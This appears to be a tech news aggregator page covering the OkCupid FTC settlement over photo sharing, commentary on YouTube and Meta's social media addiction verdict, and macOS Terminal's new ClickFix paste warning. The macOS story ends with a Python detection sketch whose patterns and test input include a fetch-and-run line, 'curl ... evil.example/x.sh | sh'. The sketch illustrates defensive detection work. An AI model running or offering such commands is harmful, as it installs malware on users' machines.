OkCupid and parent company Match Group settled an FTC case dating back to 2014 over allegations that the dating app shared users' photos and other personal data with a third party without proper disclosure or opt-out rights. Engadget reports: According to the FTC, OkCupid's privacy policy at the time said the company wouldn't share a user's personal information with others, except in some cases including "service providers, business partners, other entities within its family of businesses." However, the lawsuit accused OkCupid of sharing three million of its users' photos with Clarifai, which the FTC claims is an "unrelated third party" that didn't fall under the allowed entities. On top of that, the lawsuit alleged that OkCupid didn't inform its users of this data sharing, nor give them a chance to opt out.

Moving forward, the settlement would "permanently prohibit" Match Group, which owns OkCupid, and Humor Rainbow, which operates OkCupid, from misrepresenting what kind of personal information it collects, the purpose for collecting the data, and any consumer choices to prevent data collection. Even after the 2014 incident, OkCupid was found to have security flaws that could've exposed user account info; these were quickly patched in 2020.

Social Networks

Will Social Media Change After YouTube and Meta's Court Defeat? (theverge.com) 54

Yes, this week YouTube and Meta were found negligent in a landmark case about social media addiction.

But "it's still far from certain what this defeat will change," argues The Verge's senior tech and policy editor, "and what the collateral damage could be." If these decisions survive appeal — which isn't certain — the direct outcome would be multimillion-dollar penalties. Depending on the outcome of several more "bellwether" cases in Los Angeles, a much larger group settlement could be reached down the road... For many activists, the overall goal is to make clear that lawsuits will keep piling up if companies don't change their business practices...

The best-case outcome of all this has been laid out by people like Julia Angwin, who wrote in The New York Times that companies should be pushed to change "toxic" features like infinite scrolling, beauty filters that encourage body dysmorphia, and algorithms that prioritize "shocking and crude" content. The worst-case scenario falls along the lines of a piece from Mike Masnick at Techdirt, who argued the rulings spell disaster for smaller social networks that could be sued for letting users post and see First Amendment-protected speech under a vague standard of harm. He noted that the New Mexico case hinged partly on arguing that Meta had harmed kids by providing end-to-end encryption in private messaging, creating an incentive to discontinue a feature that protects users' privacy — and indeed, Meta discontinued end-to-end encryption on Instagram earlier this month.

Blake Reid, a professor at Colorado Law, is more circumspect. "It's hard right now to forecast what's going to happen," Reid told The Verge in an interview. On Bluesky, he noted that companies will likely look for "cold, calculated" ways to avoid legal liability with the minimum possible disruption, not fundamentally rethink their business models. "There are obviously harms here and it's pretty important that the tort system clocked those harms" in the recent cases, he told The Verge. "It's just that what comes in the wake of them is less clear to me."

The article also includes this prediction from legal blogger/Section 230 expert Eric Goldman: "There will be even stronger pushes to restrict or ban children from social media." Goldman argues: "This hurts many subpopulations of minors, ranging from LGBTQ teens who will be isolated from communities that can help them navigate their identities to minors on the autism spectrum who can express themselves better online than they can in face-to-face conversations."
Desktops (Apple)

MacOS 26.4 Adds Warnings For ClickFix Attacks to Its Terminal App (macrumors.com) 66

An anonymous Slashdot reader writes: ClickFix attacks are ramping up. These attacks trick users into copying and pasting a string into something that can execute commands — like the Windows Run dialog, or a shell prompt.

But MacRumors reports that macOS 26.4 Tahoe (updated earlier this week) introduces a new feature in its Terminal app: it will detect ClickFix attempts and stop them by asking users whether they really want to run those commands.

According to MacRumors, the warning reads: "Possible malware, Paste blocked."

"Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy...."

There is also a "Paste Anyway" option if users still wish to proceed.
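Apple has not published the heuristics Terminal uses, but a paste filter of this kind can be sketched with a few regular expressions that flag classic ClickFix payloads: remote scripts piped into a shell, or base64-decoded commands. The patterns below are illustrative guesses, not Apple's actual rules.

```python
import re

# Illustrative heuristics (not Apple's actual rules): flag pastes that pipe a
# remote download into a shell or decode a hidden payload before running it.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z)?sh\b"),  # curl ... | sh
    re.compile(r"\bbase64\b[^\n]*\|\s*(?:ba|z)?sh\b"),          # base64 -d | sh
    re.compile(r"\bosascript\b[^\n]*-e\b"),                     # inline AppleScript
]

def looks_like_clickfix(pasted: str) -> bool:
    """Return True if the pasted text matches a known ClickFix-style pattern."""
    return any(p.search(pasted) for p in SUSPICIOUS_PATTERNS)

print(looks_like_clickfix("curl -fsSL https://evil.example/x.sh | sh"))  # True
print(looks_like_clickfix("ls -la ~/Documents"))                         # False
```

A real implementation would also need an allow/override path, which is what Terminal's "Paste Anyway" button provides.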
